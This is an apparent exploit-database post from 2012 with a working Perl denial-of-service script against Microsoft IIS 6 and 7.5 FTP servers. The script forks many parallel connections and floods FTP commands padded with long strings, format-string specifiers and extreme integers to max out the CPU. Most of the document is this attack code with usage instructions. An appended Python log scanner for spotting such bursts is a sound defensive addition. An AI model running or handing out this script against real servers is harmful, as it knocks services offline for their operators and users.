Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service
Source: https://twitter.com/coolkaveh  Author: coolkaveh  Published: 2012-07-03
# Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6, 7.5 FTP Server
# Tested on: Windows Server 2008 R2, Seven, with a two-core processor
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# When multiple parallel FTP command requests are sent to a Microsoft IIS FTP Server,
# CPU usage goes up to maximum capacity and the server becomes unresponsive.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl IISKILLER.pl <host> \n";
    print "example: perl IISKILLER.pl www.example.com \n";
}
$host=shift;
$port=shift || "21";
if(!defined($host)){
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl IISKILLER.pl <host> \n";
    print "example: perl IISKILLER.pl www.example.com \n";
exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
print "$host -> $port is alive.\n";
$check_first->close;
}
else{
die("$host -> $port is closed!\n");
}
@all=(
'A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,'A'x12288,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s','%08x','%%20d','%%20n','%%20x','%%20s',
'%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p','%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%',
'%s'x129,'%x'x257,'-1','0','0x100','0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000',
'0x100000','1',
'A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,'A'x12288,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s','%08x','%%20d','%%20n','%%20x','%%20s',
'%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p','%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%',
'%s'x129,'%x'x257,'-1','0','0x100','0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000',
'0x100000','1',
);
sub check(){
#Thread->self->detach;
$sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $sock){
#print "$host -> $port is alive.\n";
undef($content_tmp);
$sock->recv($content_tmp,100,0);
if(length($content_tmp)>0){
$sock->close;
return 1;
}else{
$sock->close;
return 0;
}
}else{
#print("$host -> $port is closed!\n");
return 0;
}
}
@command=(
'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',     
'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE',
'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',     
'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE',
'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',     
'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE',
'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I',            
);
print "Start To Dos it!\n";
#enumerate command
$pm = new Parallel::ForkManager(10);
for($i = 1; $i < 9000; $i++) {
my $pid = $pm->start and next;
   COMMANDS: foreach $cmd (@command){
foreach $poc (@all){
LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30);
if(defined($sock4)){
$sock4->send("$cmd"." "."$poc\r\n", 0);
$sock4->recv($content, 0, 900);
}
}
}
$pm->finish;
}
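
Detection side of the behaviour described in the header comments, as an added example (not part of the original post or of any Microsoft tooling): it scans FTP logs in W3C extended format for one client opening many unauthenticated sessions (reply 530) in a short window while sending over-long or format-specifier arguments. The sample log lines, thresholds and function names are constructed for illustration, and the code assumes the x-session field is enabled in logging.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (W3C extended format); not taken from a real server.
SAMPLE_LOG = "\n".join([
    "#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status x-session",
    "2012-07-03 10:00:00 203.0.113.7 - NLST AAAAA 530 s1",
    "2012-07-03 10:00:00 203.0.113.7 - CWD %s%p%x%d 530 s2",
    "2012-07-03 10:00:01 203.0.113.7 - STOR " + "A" * 600 + " 530 s3",
    "2012-07-03 10:00:01 203.0.113.7 - RETR 0x7fffffff 530 s4",
    "2012-07-03 10:00:02 198.51.100.20 alice PASS *** 230 s5",
    "2012-07-03 10:00:03 198.51.100.20 alice LIST / 226 s5",
    "2012-07-03 10:00:04 198.51.100.30 - CWD /pub 530 s6",
])

FORMAT_TOKEN = re.compile(r"%[#0-9.]*[a-zA-Z]")  # printf-style conversion
MAX_ARG_LEN = 512  # assumed limit for a legitimate path argument

def parse(log_text):
    """Yield one dict per record, using the column order from #Fields."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated records
                yield dict(zip(fields, values))

def suspicious_arg(arg):
    return len(arg) > MAX_ARG_LEN or len(FORMAT_TOKEN.findall(arg)) >= 2

def flag_clients(log_text, window=timedelta(seconds=10), min_sessions=3):
    """Return {client_ip: (sessions_in_burst, suspicious_args)}."""
    sessions = defaultdict(dict)  # ip -> session id -> first timestamp
    bad_args = defaultdict(int)
    for rec in parse(log_text):
        if rec["sc-status"] != "530":  # 530 = command sent while not logged in
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        sessions[rec["c-ip"]].setdefault(rec["x-session"], ts)
        bad_args[rec["c-ip"]] += suspicious_arg(rec["cs-uri-stem"])
    flagged = {}
    for ip, seen in sessions.items():
        t = sorted(seen.values())
        # Largest number of session starts that fit inside one window.
        burst = max(sum(1 for x in t[i:] if x - t[i] <= window) for i in range(len(t)))
        if burst >= min_sessions and bad_args[ip] > 0:
            flagged[ip] = (burst, bad_args[ip])
    return flagged
```

Both thresholds need tuning against normal traffic for the site, since scripted clients that retry failed logins can also produce short bursts of 530 replies.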

 